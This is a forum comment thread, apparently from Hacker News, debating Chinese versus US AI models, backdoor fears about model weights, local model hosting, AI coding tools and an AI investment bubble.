As opposed to sending data to known IP thieves, state actors, and competitors in the USA ? Which one is the most irrational?
Before the age of AI Agent Harnesses/unbounded tool calling, there was literally ZERO risk of a .safetensors file "hacking" you. You could even air-gap and run a ton of security analysis/HIDS on your server running the model to verify this.
Now, because a microscopic risk of some chinese AI having a "trigger" to act badly in a harness when it detects its being used by some Gweilo in the USA, even locally run Chinese models are DOA for most USA based companies.
A Chinese company seems more likely to produce Chinese products that don't directly compete in the US market.
While a US company can ship the product as a feature of their platform and undercut on price while making up the revenue elsewhere
Edit: I personally use US models, but I'm not naive enough to think that's any sort of real protection of IP
Every public AI that is not full of classified material will end up being hosted where the energy cost*compute efficiency product is lowest, thievery or not.
With Chinese GPUs just a step behind (but subsidized), China putting in 8x more solar than we do in 1 year, and Chinese models just a step behind but free? All public AI will be hosted there, theft or not.
If it becomes a problem, then we’ll subsidize the rich to bring it on-shore, but only to those companies who our leaders invest in already - to maximize grift and corruption.
So odd that your erroneous criticism is at the top of HN.
EDIT: I'd love to hear my downvoters' objections. Is it possible that the mechanism that is promoting erroneous information is also demoting its correction?
It's not tribalistic or binary ,choose USA Or Choose China. We can choose neither.
Choose neither abuse.
Let's say I am making sensor software, and I say, huh, let's bring in a tiny little vision model for my EO sensor - then it can identify "boat shapes" even if it doesn't have a database of all boats. Pretty neat, right? Well, the point could be made, that the weights might be hiding behavior that will make my vision model . . not see specific boats very well.
"Landing craft? I see no landing craft."
Some decent testing would expose this in a couple shakes, but, well, now you know how much software testing happens in Defense, especially in the unmanned world. Not a whole bunch.
Weird, considering they had no issues shipping manufacturing and supply chains to China when that made economic sense.
It didn't quite work out so now people are looking for other strategies.
It's quite strange that it's very easy to detect AI in writing.
If I ask three models to write an intro to the cold war, they'll all try to pick words that sound like they should be related-ish. I'm not saying that's how they work at all, but the output is indistinguishable from just grabbing some words in the wikipedia page.
Humans make mistakes. They'll use words they recently learned. They'll use words that sound good. Entropy still applies, but these outliers are what keeps us from a synthetic piece of writing
Or you detect only the easy to detect AI writing?
I think that this is on the money, although I'd place the bar even lower - DeepSeek v4 Flash is sufficient for basically all day-to-day coding tasks.
You might want something beefier for a complicated reverse-engineering project, but it will competently one-shot a decently complicated app or API - and a $10/month OpenCode Go subscription is sufficient to keep you in tokens for such a cost-efficient model...
Similarly, my employer hands us all Cursor, I've yet to actually switch it out of "auto" mode, which mostly runs Composer (their in-house finetune of Kimi 2.5).
Most people don't have workloads that demand agentic workflows to begin with, and if their employer is pushing for that it's probably a startup that underpays or a coding sweatshop full of nepotism that fires fast.
But why should I work harder than necessary to do the same job? Why wouldn't I want to use the best tools available?
Maybe I just haven't been trying the right models?
The only caveats: I didn't play around with Qwen 3.7 Max very much, and of course these models are far cheaper than Opus.
But any suggestion that Deepseek approaches Opus in terms of quality/intelligence immediately makes me suspect propaganda - it's that noticeable of a difference.
Because even the latest opus on High don't really get what is needed, and need careful steering and a rewriting in most cases, and the code is often hard to review.
I'd rather just launch a smaller model in plan mode, argue with it and make it implement the bases I will write the code into. writing code is often faster once you know what you want, and AI most useful ability is to be a canary that also propose stuff. And I find my method faster than generating everything then reading the code to find mistakes or understand why it used X instead of Y.
I don't really read generated frontend code anyway (nor do anybody in my team care) , so I generate it and push it if it does the stuff I want it to do. For IAC it's mostly boilerplate except for 1-2 lines most of the time, and at worst a dozen, if you know where to look (and check the AI doesn't suffer from NIH), it's really easy to review generated code.
>> I am here to light up the dark path you are unknowingly walking, like lamplighters who used to light street lamps for those brave enough to walk the night alone.
>> It all fell apart quickly, turning into smoke and mirrors. You see, I committed the cardinal sin of idolatry. For that, I am an idiot too. With OpenAI, at least I knew the devil
Is this a critique of the state of AI or Tolkien fanfic?
Por que no los dos? One of the most storied AI researchers is most known for his Harry Potter fanfic, and we all know how much the techbros love naming things after Tolkien...
I think it's great to name that even if it's in this crude, sort of offensive way.
AI thinking has had this weird effect on me though like you say, where I want to write sentences with more commas in them, and like, try to make 3 points and 3 separate commas in a sentence to condense information better.
Also what local models are people running and actually finding useful?
They could be trained to generate code that would phone home. But these are just tools, anybody doing the right thing and checking and understanding every line of code that they use an LLM to generate has nothing to worry about.
On top of that, all claims of this are written on devices built on Chinese hardware. That makes it a joke to worry about hidden backdoors in Chinese models. Completely inane to pretend that Chinese model backdoors (for which there doesn't exist a sliver of evidence) would change anything when near every device in the US contains Chinese-written firmware in some shape or form.
It's All-American FUD.
With all the sloppers not looking at the code this is bliss for that sort of things
We aren't yet at the point where running local models can compete with DC type infrastructure but it's not that far away either. 12B models are easy to run on consumer hardware. 31B models aren't that hard either but the tokens/sec are a bit slow. Where will we be in 3 years? 5? I think we'll be running 100B+ models on <$5000 PCs. And at that point is there a law of diminishing returns with even bigger models? We will see.
The issue is that several companies, most notably OpenAI, are predicated on:
1. There will be an AI moat; and
2. That company will "win" or "own" AI.
That's the basis of the OpenAI valuation. If that doesn't happen, it's going to be ahuge problem to recover sufficient revenue to recoup the investment. And I don't think it will happen.
In 3-5 years the NVidia hardware you buy will be several times cheaper and faster than what we have now. That will massively depreciate existing investments because it will ultimately come down to performance-per-Watt but if a theoretical G100 can do 3-4x of the inference of an H100 for the same power, the older hardware just won't be able to compete.
And this is the core of why this will all end in tears. You have race conditions and thread inversion issues, between four threads in the virtual cpu of this bubble. And you are going to experience some nasty deadlocks.
T1 is -> Depreciation and amortization
T2 is -> NVDA, AMD and others booking revenues at the time they do
T3 is -> Constraint theory at it applies to time until physical deployment and data centers energy constraints
T4 is -> US Treasury bonds rates and cost of credit
How should a local-run Chinese Model "phone home" if someone runs it locally on the hardware? I think Im missing some understanding here?
Hey, don't malign smut. It's the great technological motivator
"Trump to meet AI leaders to discuss US investment in their companies" - https://www.bbc.com/news/articles/c98r8r7dz5no
"Trump Officials Held Millions of Dollars of SpaceX Ahead of IPO" - https://finance.yahoo.com/markets/stocks/articles/trump-offi...
"Your 401K Is Their Exit Strategy" - https://news.ycombinator.com/item?id=48433705
I can't see OpenAI or Anthropic undermining their business by releasing top tier open models, but surely Nvidia will do it eventually.
I sure am glad we left idolatry behind.
I haven't totally processed this, but it seems like there's a useful connection here. There are all kinds of workers who bizarrely take on the perspectives of the billionaire class, even when it actively harms their interests. Some of it is ignorance and simply getting duped by propaganda, but now I wonder if there may be a para-social component as well, like those guys pathetically wasting money on OnlyFans: "if I carry a torch for the billionaires schemes, then I can feel I'm like them and part of their group."